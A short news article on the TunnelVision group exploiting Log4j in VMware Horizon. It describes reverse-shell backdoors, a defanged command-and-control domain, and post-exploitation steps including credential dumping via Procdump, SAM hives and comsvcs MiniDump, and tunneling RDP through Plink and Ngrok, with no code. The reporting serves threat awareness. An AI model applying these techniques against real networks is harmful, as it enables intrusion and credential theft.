An Iranian-aligned hacking group tracked as TunnelVision was spotted exploiting Log4j on VMware Horizon servers to breach corporate networks in the Middle East and the United States.
The ultimate goal of TunnelVision appears to be the deployment of ransomware, so the group is not focused on cyber espionage only but data destruction and operational disturbance too. The name itself says that Tunneling is the process of routing data traffic in such a way that its transmission becomes obfuscated or even hidden.
TunnelVision dropped two custom reverse shell backdoors onto compromised machines. The first payload is a zip file that contains an executable named "InteropServices.exe," which contains an obfuscated reverse shell beaconing to "microsoft-updateserver[.]cf."
The second payload, which was predominately used by the threat actors in recent attacks, is a modified version of a one-liner PowerShell available on GitHub. The exploitation process involves the direct execution of PowerShell commands and the activation of reverse shells via the Tomcat service.
TunnelVision relies on this second backdoor to execute recon commands; create backdoor users and add them to the administrators' group; credential harvesting using Procdump, SAM hive dumps, and comsvcs MiniDump; download and execute tunneling tools, including Plink and Ngrok, used to tunnel RDP traffic; execution of a reverse shell utilizing VMware Horizon NodeJS component; perform RDP scans on the internal subnet using a publicly available port scan script.
See What’s Next in Tech With the Fast Forward Newsletter
Tweets From @varindiamag
Nothing to see here - yet
When they Tweet, their Tweets will show up here.